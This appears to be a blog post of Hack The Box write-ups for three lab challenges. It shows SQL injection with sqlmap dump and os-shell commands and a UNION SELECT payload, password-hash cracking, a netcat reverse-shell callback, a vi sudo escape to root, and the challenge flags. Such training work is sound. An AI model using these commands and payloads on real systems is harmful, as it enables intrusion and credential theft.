KORP Terminal is a very easy web challenge created by leanthedev on Hack The Box. This challenges requires knowledge of SQL injection. Unlike previous tasks, we don’t have the option to look at the source code for this challenge. Hello world, welcome to haxez where today I will be attempting to own KORP Terminal.
KORP Terminal Application Enumeration
Upon navigating to the application, we are presented with a blue background and a login box. Thats it. You can view the source code but there isn’t much there to view. I ran OWASP ZAP Ajax spider and active scan against it but it didn’t find anything other than the low hanging fruit of HTTP headers. The application has a login box but that’s it. As a result, I attempted some default creds such as admin admin but no luck.
Attacking The Application
Since there isn’t anything else other than the login form, I’m going to go out on a limb and say that I’m supposed to attack that. There are multiple ways that we could attack it. For example, we could use something like Hydra to try and brute force our way in. However, since we don’t know the username, we could be here all day. Instead, lets assume that it is powered by a database and start with some basic SQL injection attacks. To start with, I input a single quite in to both the username and password box. As shown below, the application is indeed vulnerable to SQL injection due to the lack of prepared statements.
Preparing The Request
To attack the login form, I’m going to sqlmap. However, first I need a valid POST request containing the username and password parameters. Did you know that if you specify an Asterix (*) in the parameters of the request, sqlmap will automatically recognise them as insertion points? I didn’t until today. As you can see below, I found the login POST request in ZAP and copies the request to a file called request.txt.
KORP Terminal SQL Injection
To keep it short and sweet, I ran sqlmap against the request. It automatically identified the insertion points and found that it was vulnerable. Next, I simply told sqlmap to dump the database and eureka! it spat out a username and password hash. As you can see from the image below, the username is admin and the password hash appears to be a bcrypt hash (at least according to hashcat examples).
Next, it was time to crack the hash. As per the link above in the hashcat examples, you can find the type of hash and the cracking mode needed to crack it. I used the rockyou wordlist because it is a fairly common wordlist and most of the passwords for these challenges and the boxes tend to appear in there. After a few minutes (running on a vm because noob) I cracked the hash. As you can see from the screenshot below, the password was password123. With the username admin and the newly cracked password, I was able to login and get the hash.
HTB{t3rm1n4l_cr4ck1ng_4nd_0th3r_sh3n4nig4n5}
KORP Terminal Learnings
Not much to say about this one. It was a nice fun quick challenge before I power down for the evening. I suppose a lesson that can be taken from this challenge is not to rely on automated scanners like Burp or OWASP Active Scan. They don’t always find a vulnerability that could easily be found by just submitting a single quotation mark. I find it odd that it didn’t find the error but anyway that’s all from today.
Unholy Union is a very easy box created by Xclow3n on Hack The Box. As the name suggests, we will need some SQL skills to complete this challenge. Hello world, welcome to haxez where today I will be refreshing my SQLi skills and attempting to complete this very easy challenge. I haven’t done proper SQL injection in a while, especially UNION based injection.
Unholy Union Application Enumeration
I started by navigating to the page in my browser. With these challenges, there is usually fairly little to actually enumerate. The vulnerability is tends to be fairly obvious but its exploiting that vulnerability that’s the problem. As you can see from the image below, OWASP ZAP found the SQL injection vulnerability without issue. However, finding the vulnerability and getting the flag are two different problems entirely. I could run SQL map against it and try and dump the whole database. Actually, that’s exactly what I’m going to do.
The Easy Way With SQLMAP
First, I wanted to check if the database was vulnerable so I ran the following command and identified that there were 5 columns.
Next, I ran the following command to get the database names. I could have just dumped everything but that would be a lot of data to sort through and would take much longer. As you can see from the results below, I found three databases.
It seemed fairly obvious that the database I needed was called halloween_invetory so I specified that in the next query and used it to dump the tables in that database.
With the name of the database and the table I was able to use sqlmap to dump the contents of the table and retrieve the flag. It was fairly ovbious which table contained the flag. As you can see below, I used the following command to dump the flag and complete the challenge.
sqlmap -u http://94.237.54.42:37032/search?query= --union-cols=5 -D halloween_invetory -T flag --dump
HTB{un10n_1Nj3ct1on_15_345y_t0_l34rn_r1gh17?}
The Hard Way
I’m not going to go in to too much detail on this method as I have already got the flag. However, in order to perform a UNION based SQL injection you would first identify whether the application is vulnerable. This is often achieved by placing a single quotation mark or a ` in the query to break the syntax. As shown below, the application does produce an error message when breaking the syntax.
Next, you would determine how many columns there are by using NULL value columns. To explain, using the NULL value means no data. Therefore, it should produce an error due to the formatting of the column. Furthermore, if the number of columns is wrong, the database will produce an error. For example, if I used three NULL columns and tried to concatenate in to the fourth column I would get an error.
Gun' UNION SELECT NULL, NULL, NULL, (SELECT GROUP_CONCAT(SCHEMA_NAME) FROM information_schema.schemata) -- -
However, if I used 4 NULL columns and then concatinate the results in to the 5th column it works. The syntax would be correct as there are 5 columns. As you can see from the image below, the syntax is correct and the data from the information schema table is dumped.
This method can then be used to find the names of the databases, tables and to eventually select the data from the flag table.
Unholy Union Learnings
I should have spent more time going through this one to do it manually but I’m a bit short on time. It was a fun challenge anyway and it jogged my memory on a few things. I struggled with the injection syntax as it has been a long time since I have done it manually. You could argue that is why we have tools but I don’t think thats a good attitude to have. I understand the vulnerability though and how it is structured. It’s just remembering what to use where.
Hello world, welcome to haxez where today we’re looking at Vaccine from Hack The Box. What’s that you say? You don’t know where to begin when trying to hack something? Well, my old chum I’ve got your back. So provided you have permission to hack the target you want to hack and that the rules of engagement have been agreed upon; you start by scanning the box. There are many security tools that can scan a host for vulnerabilities. If you want something quick and easy then check out Nessus, however Nmap is an essential tool that everyone should learn. So connect to the VPN, spin up the box and Nmap the heck out of it.
Vaccine Enumeration
Sudo nmap -sC -sV -O -p0- 10.10.10.46
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu)
FTP
As you can see from the results, port 21 FTP (File Transfer Protocol), port 22 (Secure Shell) and port 80 (HTTP/Web Server) are exposed (not like that). The first thing I checked was whether FTP allowed Anonymous access, it didn’t. I then checked the website, but it required a login. However, after performing some post exploitation investigation on the previous box Oopsie, I found the FTP credentials ftpuser / mc@F1l3ZilL4.
$ ftp 10.10.10.46
Connected to 10.10.10.46.
220 (vsFTPd 3.0.3)
Name (10.10.10.46:joe): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r — r — 1 0 0 2533 Feb 03 2020 backup.zip
226 Directory send OK
Vaccine Hash
Huzzah! The credentials worked and what’s that? A file called backup.zip? I needed to take a look at the contents of that zip file so I downloaded it using the get command. Once the zip file was downloaded, I tried to unzip but it promoted me for a password. The FTP password didn’t work neither did any of the passwords from the previous boxes. Luckily a tool exists that can be used to crack zip file passwords. Zip2john is a tool that creates a hash from a zip file that can then be cracked using johntheripper.
Now that we generated the hash, it was time to crack it using JohnTheRipper. In order to do this we point john at the hash and tell it which wordlist to use. As with all cracking a good place to start is rockyou.txt.
─[10.10.15.199]─[joe@parrot]─[/media/sf_admin/Vaccine/Output] └──╼ [★]$ sudo john hash.txt — wordlist=/usr/share/wordlists/rockyou.txt [sudo] password for joe: Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 2 OpenMP threads Press ‘q’ or Ctrl-C to abort, almost any other key for status 741852963 (backup.zip) 1g 0:00:00:00 DONE (2021–09–07 19:02) 3.703g/s 15170p/s 15170c/s 15170C/s 123456..samanta Use the “ — show” option to display all of the cracked passwords reliably Session completed
Woop! looks like the password is 741852963. I tried to extract the zip file again using the password and it worked. The zip archived appeared to contain a CSS file (Cascading Stylesheet and an index.php file.
Since the CSS file was only likely to contain website formatting, I looked at the index.php file first. Well what do you know, it looks like the index.php file had an MD5 password hash hardcoded in to the applications authentication mechanism.
A lot of MD5 password hashes can be cracked online using websites like https://crackstation.net. However, you may not always have internet access especially if you are testing a clients internal infrastructure which doesn’t have internet access. For that reason, I decided to use Hashcat. Hashcat is another cracking tool like JohnTheRipper.
The hash was successfully cracked, and I must say I was disappointed to learn it was something as simple as qwerty789. Anyway, I was then able to login to the website with the newly cracked password. Upon log in, the website was very basic. The only functionality appeared to be a search box. This instantly made me think the vulnerability was going to be some form of SQL injection. As the website was behind an authentication mechanism, I needed a way to tell SQLMap to authenticate against the application. In order to do this inspected the website and nabbed my PHPSESSID cookie.
PHPSESSID Cookie
Vaccine SQL Injection
The first few attempts to scan the host with SQLMap were unsuccessful as no vulnerability was discovered. It had to be an SQL injection vulnerability because I had exhausted all other avenues of attack other than brute forcing the Secure Shell port. After a bit of research and a lot of reading on the HTB forums, it turns out that if another hacker exploits the SQL injection first then it won’t show as vulnerable when scanned again, not 100% sure why (weird). Anyway after requesting to reset the box a billion times I was finally able to see that the search parameter was vulnerable to SQL Injection.
─[10.10.15.199]─[joe@parrot]─[/media/sf_admin/Vaccine/Output] └──╼ [★]$ sudo sqlmap -u ‘http://10.10.10.46/dashboard.php?search=a' — cookie=”PHPSESSID=s6j01lrmbrqh5no9pgjdg3ka2a”[*] starting @ 20:08:00 /2021–09–07/ [20:08:01] [INFO] testing connection to the target URL [20:08:02] [INFO] testing if the target URL content is stable [20:08:02] [INFO] target URL content is stable [20:08:02] [INFO] testing if GET parameter ‘search’ is dynamic [20:08:02] [INFO] GET parameter ‘search’ appears to be dynamic [20:08:02] [INFO] heuristic (basic) test shows that GET parameter ‘search’ might be injectable (possible DBMS: ‘PostgreSQL’) ---SNIP--- [20:08:09] [INFO] GET parameter ‘search’ appears to be ‘PostgreSQL > 8.1 stacked queries (comment)’ injectable [20:08:09] [INFO] testing ‘PostgreSQL > 8.1 AND time-based blind’ [20:08:12] [INFO] GET parameter ‘search’ appears to be ‘PostgreSQL > 8.1 AND time-based blind’ injectable [20:08:12] [INFO] testing ‘Generic UNION query (NULL) — 1 to 20 columns’ GET parameter ‘search’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
It was time to see whether we could get a shell on the box through SQLMap.
─[10.10.15.199]─[joe@parrot]─[/media/sf_admin/Vaccine/Output] └──╼ [★]$ sudo sqlmap -u ‘http://10.10.10.46/dashboard.php?search=a' — cookie=”PHPSESSID=s6j01lrmbrqh5no9pgjdg3ka2a” — os-shell[*] starting @ 20:08:20 /2021–09–07/ [20:08:22] [INFO] resuming back-end DBMS ‘postgresql’ [20:08:22] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: Parameter: search (GET) ---SNIP--- [20:08:23] [INFO] the back-end DBMS is PostgreSQL web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan) web application technology: Apache 2.4.41 back-end DBMS: PostgreSQL [20:08:23] [INFO] fingerprinting the back-end DBMS operating system [20:08:24] [INFO] the back-end DBMS operating system is Linux [20:08:24] [INFO] testing if current user is DBA [20:08:25] [INFO] retrieved: ‘1’ [20:08:25] [INFO] going to use ‘COPY … FROM PROGRAM …’ command execution [20:08:25] [INFO] calling Linux OS shell. To quit type ‘x’ or ‘q’ and press ENTER
Brilliant, this gave us an os-shell. In order to upgrade it to a full shell I needed to create a netcat listener and run a command on the server to get it to connect back to my host. First I created the netcat listener.
The command worked and the target server connected by to my host netcat listener.
10.10.10.46: inverse host lookup failed: Unknown host connect to [10.10.15.199] from (UNKNOWN) [10.10.10.46] 38336 bash: cannot set terminal process group (1502): Inappropriate ioctl for device bash: no job control in this shell postgres@vaccine:/var/lib/postgresql/11/main$ whoami postgres
Now that I had access to the server it was time to perform some further investigation. I checked the history and then started looking through the website files. I found one file called dashboard.php.
Bingo, we found a PHP database connection string with the postgres users password. I was then able to use the password to see what the postgres user had permissions to run.
postgres@vaccine:/var/lib/postgresql/11/main$ sudo -l [sudo] password for postgres: P@s5w0rd! Matching Defaults entries for postgres on vaccine: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User postgres may run the following commands on vaccine: (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
It appeared as that the postgres user had the ability to edit the pg_hba.conf configuration file using the vi tool. This was great news as vi has a built-in terminal that allows you to execute commands. After running the /bin/vi /etc/postgresql/11/main/pg_hba.conf command you can press escape and then type :!/bin/bash. This drop you in to a root shell where you can snag the root.txt file. There is no user.txt file on this target.
